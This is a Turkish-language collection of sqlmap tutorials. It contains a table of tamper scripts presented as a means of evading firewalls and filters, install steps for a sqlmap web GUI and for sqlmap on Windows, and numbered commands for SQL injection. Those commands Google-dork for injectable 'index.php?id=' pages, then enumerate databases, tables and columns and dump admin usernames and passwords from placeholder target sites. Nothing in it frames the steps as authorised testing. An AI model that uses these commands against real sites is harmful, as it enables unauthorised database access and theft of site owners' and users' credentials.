SQLMap Tamper Scripts

SQLMAP TAMPER SCRİPTS,


Sqlmap'de "tamper" (sabotaj) seçeneklerini anlamak.

Selamun ALeyküm ..
Aşagıdaki tabloada tamperlarin nerede kullanabiecegimizi görebeliceginiz bir tablo var.
Sabotaj verilerini kullanmanın, güvenlik duvarlarından kaçınmak ve olası bir uygulamayı filtrelemenin en büyük amacı olsa da, ne tür bir veritabanı yöneticisinin ne tür bir uygulayıcıya başvurduğunu bilmesi gerekir. 

Not: 
(*) Tüm sürümler için işe yarayabilir.
(-) uygulanmaz

TAMPERMySQLMSSQLOraclePostgreSQL
apostrophemask****
apostrophenullencode----
appendnullbyte****
base64encode4,5,5.5200510g-
between5.1---
bluecoat****
apostrophemask9.0.32000,2005-9.3
charunicodeencode4,5.0 and 5.5200510g8.3,8.4,9.0
charencode*---
commalessmid*---
concat2concatws****
equaltolike****
greatest< 5.1---
halfversionedmorekeywords5.0 and 5.5---
ifnull2ifisnull****
informationschemacomment4,5.0,5.5200510g8.3,8.4,9.0
lowercase5.0---
modsecurityversioned5.0---
modsecurityzeroversioned****
multiplespaces****
nonrecursivereplacement****
overlongutf85.1.56,5.5.112000, 2005N/A9.0
percentage4, 5.0,5.5200510g8.3,8.4,9.0
randomcase****
randomcomments****
securesphere4,5.0,5.5200510g8.3,8.4,9.0
space2comment----
space2dash4.0,5.0---
space2hash>= 5.1.13---
space2morehash-2000, 2005--
space2mssqlblank**--
space2mssqlhash****
space2plus4,5.0,5.5200510g8.3,8.4,9.0
space2randomblank-*--
sp_password****
symboliclogical****
unionalltounion****
unmagicquotes4, 5.0,5.5200510g8.3,8.4,9.0
uppercase****
varnish*---
versionedkeywords>=5.1.13---
versionedmorekeywords****
xforwardedfor****

Kali Linux Sqlmap Web Gui

Selamun Aleyküm ..

Kurulum:
git clone https://github.com/Hood3dRob1n/SQLMAP-Web-GUI.git
Sqlmap dizinini ve içeriklerini web kök dizininize kopyalayın. (cd SQLMAP-Web-GUI && cp -R sqlmap / /var/www/html)

Kullanmak istediğinizde, sqlmap API sunucusunu ve apache servisini çalıştirin (python /home/user/sqlmap/sqlmapapi.py -s)
Daha sonra başlatmak için tarayıcınızda Web GUI adresine gidebilirsiniz. (http://127.0.0.1/sqlmap/index.php yada)


Ek olarak videonun devamini çektim ancak birleştiremedim birleşince bir buçuk saat oluyor sebebsiz yere anlam veremedim neyse. sqlmap web gui de enumeration kısmından db ayarlarını yapmanız gerekıyor işlem bitince View Scan Log dosyasında görebilirsiniz detaylari.

Sqlmap Kullanimi

Selamun Aleyküm ...

Akademi İçin Çektigim Genel Sqlmap Kullanimi,
Daha İyi Anlamanız İçin İşlemleri Numaralandırdım.



Dork Taramasi için:
1 : sqlmap.py  -g "index.php?id=" 

Veritabani Çekmek için :
2: sqlmap.py -u   "http://www.example.com/media.php?id=26"  --dbs
Veritabanındaki Tabloları Çekmek İçin : 
3: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables 
Kolanları Çekmek İçin :
4: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns 
Admin Bilgilerini Çekmek İçin
5: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı Admin,id,pass --dump


Ne Kadar Kısa Tutmaya Çalışsamda Video Uzadi 
Hd İzleyin


Umarım Anlaşılır Ve Yararli Olur.

Windowsa Sqlmap Kurma

Selamun Aleyküm ..

Windows İşletim Sistemine Sqlmap Kurmayi Gösterdim 

Videolu Anlatım Yapıcaktim Windows Güncelleştirmelerinde Sorun Yaşıyorum
NetFramework  Güncelleştirmesinide Yapamadım O Yüzden Resimli Anlatım Olarak Devam Ediyorum..

Sqlmap Nedir ?

  Python Programlama Dili Kullanılarak Geliştirilmiş Sql İnjection Zaafiyetlerini İstismar Etmeye Yarayan Bir Araçtır. Webmaster Yada Programcıların Sql İnjection Ataklarını Engellemek İçin Kullandıkları Bir Takım Güvenlik Önlemlerini Sqlmap Araçlarını Kullananarak Bypass Etmek Mümkün.

Gerekli Araçlarimiz

 Sqlmap Download

Sqlmap'i İndirdikten Sonra Masaüstüne Çıkarıyoruz Klasör Adını sqlmap Olarak Değiştiriyoruz

 Python Downloads
Sisteminize Uygun Olan Sürümü İndiriniz

Pythonun Kurulumundan Bahsetmeyeceğim Basit Zaten 

Ardından 
Başlat > cmd > 
Yazarak Komut Satırımızı Açıyoruz.

cd Desktop
cd sqlmap
sqlmap.py
Entere Basarak Tamamlıyoruz


Kurulumumuz Bitti

 Bazı Sqlmap Komutları: 
Komutlar Hakkında Ayrıntılı Bilgi Almak İçin
sqlmap -h Yazarak Bilgi Alabilirsiniz.

Veritabani Çekmek için : 

sqlmap.py -u http://www.hedefsite.com/sqlacık=1 --dbs

Veritabanındaki Tabloları Çekmek İçin : 

sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables

Kolanları Çekmek İçin :

sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns

Kullanici Bilgilerini Çekmek İçin 

sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
 


TrazeR Sundu //